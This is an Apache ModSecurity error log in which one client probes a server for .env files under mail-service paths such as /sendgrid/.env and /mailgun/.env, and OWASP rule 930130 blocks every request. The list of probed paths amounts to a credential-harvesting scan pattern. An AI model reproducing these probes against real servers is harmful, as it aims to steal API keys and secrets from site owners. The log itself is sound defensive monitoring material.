[Mon May 11 18:03:33.731427 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/notifications/.env"] [unique_id "agH91UWKUxpmnkK7zHyiOQAAAQ4"]
[Mon May 11 18:03:33.731734 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91UWKUxpmnkK7zHyiOQAAAQ4"]
[Mon May 11 18:03:33.899541 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/notify/.env"] [unique_id "agH91UWKUxpmnkK7zHyiOgAAAQ4"]
[Mon May 11 18:03:33.899760 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/notify/.env"] [unique_id "agH91UWKUxpmnkK7zHyiOgAAAQ4"]
[Mon May 11 18:03:33.900056 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91UWKUxpmnkK7zHyiOgAAAQ4"]
[Mon May 11 18:03:34.091023 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sender/.env"] [unique_id "agH91kWKUxpmnkK7zHyiOwAAAQ4"]
[Mon May 11 18:03:34.091425 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sender/.env"] [unique_id "agH91kWKUxpmnkK7zHyiOwAAAQ4"]
[Mon May 11 18:03:34.092120 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91kWKUxpmnkK7zHyiOwAAAQ4"]
[Mon May 11 18:03:34.277412 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/campaign/.env"] [unique_id "agH91kWKUxpmnkK7zHyiPQAAAQ4"]
[Mon May 11 18:03:34.277651 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/campaign/.env"] [unique_id "agH91kWKUxpmnkK7zHyiPQAAAQ4"]
[Mon May 11 18:03:34.278042 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91kWKUxpmnkK7zHyiPQAAAQ4"]
[Mon May 11 18:03:34.457786 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/newsletter/.env"] [unique_id "agH91kWKUxpmnkK7zHyiPgAAAQ4"]
[Mon May 11 18:03:34.458014 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/newsletter/.env"] [unique_id "agH91kWKUxpmnkK7zHyiPgAAAQ4"]
[Mon May 11 18:03:34.458336 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91kWKUxpmnkK7zHyiPgAAAQ4"]
[Mon May 11 18:03:34.653458 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/ses/.env"] [unique_id "agH91kWKUxpmnkK7zHyiPwAAAQ4"]
[Mon May 11 18:03:34.653785 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/ses/.env"] [unique_id "agH91kWKUxpmnkK7zHyiPwAAAQ4"]
[Mon May 11 18:03:34.654231 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91kWKUxpmnkK7zHyiPwAAAQ4"]
[Mon May 11 18:03:34.990789 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sendgrid/.env"] [unique_id "agH91kWKUxpmnkK7zHyiQgAAAQ4"]
[Mon May 11 18:03:34.991077 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sendgrid/.env"] [unique_id "agH91kWKUxpmnkK7zHyiQgAAAQ4"]
[Mon May 11 18:03:34.991408 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91kWKUxpmnkK7zHyiQgAAAQ4"]
[Mon May 11 18:03:35.219314 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sparkpost/.env"] [unique_id "agH910WKUxpmnkK7zHyiQwAAAQ4"]
[Mon May 11 18:03:35.219652 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sparkpost/.env"] [unique_id "agH910WKUxpmnkK7zHyiQwAAAQ4"]
[Mon May 11 18:03:35.220104 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH910WKUxpmnkK7zHyiQwAAAQ4"]
[Mon May 11 18:03:35.439119 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/postmark/.env"] [unique_id "agH910WKUxpmnkK7zHyiRAAAAQ4"]
[Mon May 11 18:03:35.439356 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/postmark/.env"] [unique_id "agH910WKUxpmnkK7zHyiRAAAAQ4"]
[Mon May 11 18:03:35.439655 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH910WKUxpmnkK7zHyiRAAAAQ4"]
[Mon May 11 18:03:35.676695 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailgun/.env"] [unique_id "agH910WKUxpmnkK7zHyiRQAAAQ4"]
[Mon May 11 18:03:35.676916 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailgun/.env"] [unique_id "agH910WKUxpmnkK7zHyiRQAAAQ4"]
[Mon May 11 18:03:35.677202 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH910WKUxpmnkK7zHyiRQAAAQ4"]
[Mon May 11 18:03:35.886233 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mandrill/.env"] [unique_id "agH910WKUxpmnkK7zHyiRgAAAQ4"]
[Mon May 11 18:03:35.886477 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mandrill/.env"] [unique_id "agH910WKUxpmnkK7zHyiRgAAAQ4"]
[Mon May 11 18:03:35.886783 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH910WKUxpmnkK7zHyiRgAAAQ4"]
[Mon May 11 18:03:36.065654 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailjet/.env"] [unique_id "agH92EWKUxpmnkK7zHyiSAAAAQ4"]
[Mon May 11 18:03:36.066045 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailjet/.env"] [unique_id "agH92EWKUxpmnkK7zHyiSAAAAQ4"]
[Mon May 11 18:03:36.066523 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92EWKUxpmnkK7zHyiSAAAAQ4"]
[Mon May 11 18:03:36.245090 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/brevo/.env"] [unique_id "agH92EWKUxpmnkK7zHyiSgAAAQ4"]
[Mon May 11 18:03:36.245336 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/brevo/.env"] [unique_id "agH92EWKUxpmnkK7zHyiSgAAAQ4"]
[Mon May 11 18:03:36.245635 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92EWKUxpmnkK7zHyiSgAAAQ4"]
[Mon May 11 18:03:36.434912 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/transactional/.env"] [unique_id "agH92EWKUxpmnkK7zHyiTAAAAQ4"]
[Mon May 11 18:03:36.435182 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/transactional/.env"] [unique_id "agH92EWKUxpmnkK7zHyiTAAAAQ4"]
